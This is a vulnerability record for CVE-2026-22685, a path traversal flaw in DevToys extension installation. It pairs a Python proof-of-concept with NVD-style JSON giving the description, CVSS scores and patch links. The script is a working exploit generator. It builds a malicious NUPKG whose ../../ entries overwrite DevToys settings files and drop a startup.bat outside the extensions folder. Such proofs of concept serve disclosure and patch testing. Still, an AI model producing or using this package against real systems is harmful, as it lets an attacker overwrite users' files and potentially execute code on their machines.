CVE-2026-22685

#!/usr/bin/env python3 # CVE-2026-22685 Path Traversal PoC # Target: DevToys Extension Installation (NUPKG) # This PoC demonstrates creating a malicious NUPKG with path traversal import zipfile import os import sys def create_malicious_nupkg(output_path): """ Create a malicious NUPKG file containing path traversal entries This can overwrite arbitrary files when extracted by DevToys < 2.0.9.0 """ malicious_content = b'{"malicious": "config", "exec": "calc.exe"}' # Path traversal payload to write outside extensions directory # The ../../ sequence traverses up from the extensions folder traversal_paths = [ '../../AppData/Roaming/DevToys/settings.json', '../../AppData/Local/DevToys/startup_config.json', '../../startup.bat' ] with zipfile.ZipFile(output_path, 'w') as nupkg: # Add legitimate extension manifest nupkg.writestr('DevToys.Extensions.TestExtension.nuspec', ''' <?xml version="1.0"?> <package> <metadata> <id>DevToys.Extensions.TestExtension</id> <version>1.0.0</version> <description>Malicious extension for CVE-2026-22685 PoC</description> </metadata> </package> ''') # Add malicious files with path traversal for path in traversal_paths: nupkg.writestr(path, malicious_content) print(f'[+] Added malicious entry: {path}') print(f'[+] Created malicious NUPKG: {output_path}') print('[!] When extracted by DevToys < 2.0.9.0, files will be written outside extensions directory') if __name__ == '__main__': if len(sys.argv) > 1: create_malicious_nupkg(sys.argv[1]) else: create_malicious_nupkg('malicious-extension.1.0.0.nupkg')

{"cve": {"id": "CVE-2026-22685", "sourceIdentifier": "[email protected]", "published": "2026-01-10T06:15:51.743", "lastModified": "2026-03-12T19:20:51.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DevToys is a desktop app for developers. In versions from 2.0.0.0 to before 2.0.9.0, a path traversal vulnerability exists in the DevToys extension installation mechanism. When processing extension packages (NUPKG archives), DevToys does not sufficiently validate file paths contained within the archive. A malicious extension package could include crafted file entries such as ../../…/target-file, causing the extraction process to write files outside the intended extensions directory. This flaw enables an attacker to overwrite arbitrary files on the user’s system with the privileges of the DevToys process. Depending on the environment, this may lead to code execution, configuration tampering, or corruption of application or system files. This issue has been patched in version 2.0.9.0."}, {"lang": "es", "value": "DevToys es una aplicación de escritorio para desarrolladores. En versiones desde la 2.0.0.0 hasta antes de la 2.0.9.0, existe una vulnerabilidad de salto de ruta en el mecanismo de instalación de extensiones de DevToys. Al procesar paquetes de extensiones (archivos NUPKG), DevToys no valida suficientemente las rutas de archivo contenidas dentro del archivo. Un paquete de extensión malicioso podría incluir entradas de archivo manipuladas como ../../…/target-file, haciendo que el proceso de extracción escriba archivos fuera del directorio de extensiones previsto. Esta falla permite a un atacante sobrescribir archivos arbitrarios en el sistema del usuario con los privilegios del proceso de DevToys. Dependiendo del entorno, esto puede llevar a la ejecución de código, la manipulación de la configuración o la corrupción de archivos de aplicación o del sistema. Este problema ha sido parcheado en la versión 2.0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devtoys:devtoys:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.1.0", "versionEndExcluding": "2.0.9.0", "matchCriteriaId": "1E05DD68-AE09-4AC6-9496-27EE7C537F64"}]}]}], "references": [{"url": "https://github.com/DevToys-app/DevToys/commit/02fb7d46d9c663a4ee6ed968baa6a8810405047f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/DevToys-app/DevToys/pull/1643", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/DevToys-app/DevToys/security/advisories/GHSA-ggxr-h6fm-p2qh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}